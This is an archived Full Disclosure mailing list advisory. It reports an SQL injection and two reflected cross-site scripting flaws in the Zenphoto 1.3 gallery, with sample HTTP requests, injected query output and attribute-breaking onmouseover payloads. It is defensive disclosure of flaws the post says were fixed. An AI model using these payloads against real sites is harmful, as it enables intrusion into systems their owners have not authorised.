Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Security problems in Zenphoto version 1.3

From: Bogdan Calin <bogdan () acunetix com>
Date: Tue, 07 Sep 2010 16:09:33 +0300
We are continuing with the list of security vulnerabilities found in a
number of web applications while testing our latest version of Acunetix
WVS v7  . In this blog post, we will look into the details of a number
of security problems discovered by Acunetix WVS in the popular web
gallery application Zenphoto.

    Zenphoto is a standalone gallery CMS that just makes sense and
doesn’t try to do everything and your dishes. We hope you agree with our
philosophy: simpler is better. Don’t get us wrong though – Zenphoto
really does have everything you need for web media gallery management.

The following web vulnerabilities were found in Zenphoto Version 1.3;

1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.
2. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “from”.
3.Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Technical details about each web vulnerability are below;

1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.

Source file: /var/www/zenphoto_1_3/zp-core/functions-db.php line: 65

Additional details:

SQL Query:
SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE
"1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/
        ACUEND"

Stack trace:
1. query([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE
`folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/\n
ACUEND"", [boolean] false)
  2. query_full_array([string] "SELECT `id`, `album_theme` FROM
`zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE
"1ACUSTART'"*/\n        ACUEND"")
  3. getAlbumInherited([string] "1ACUSTART'"*/\n        ACUEND", [string]
"album_theme", [NULL] )
  4. themeSetup([string] "1ACUSTART'"*/\n       ACUEND")

As you can see in the SQL query (or the stack trace), in order to alter
the SQL statement sent to the database you need to use a double qoute
(not a single one, as in most SQL injections).

Sample HTTP request:
GET
/zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75
HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)


2. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “from”.

Attack details

URL encoded GET input from was set to ” onmouseover=prompt(934419) bad=”.
The input is reflected inside a tag element between double quotes.

Sample HTTP request:
GET
/zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22
HTTP/1.1
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)

3. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Attack details

URL encoded POST input user was set to ” onmouseover=prompt(932890) bad=”.
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:
POST /zenphoto_1_3/zp-core/admin.php HTTP/1.1
Content-Length: 149
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)

code_h=1644ca84b35bf7663c5e828744339de8&login=1&pass=acUn3t1x&redirect=%2fzp-core%2fadmin.php&user=%22%20onmouseover%3dprompt%28932890%29%20bad%3d%22

These vulnerabilities were reported to the Zenphoto team on 22/7/2010
via the trac system on their website and they were fixed in latest
version of Zenphoto. If you are using Zenphoto, download the latest
version from their website.

-
Bogdan Calin - bogdan [at] acunetix.com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
Follow us on Twitter - http://www.twitter.com/acunetix

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: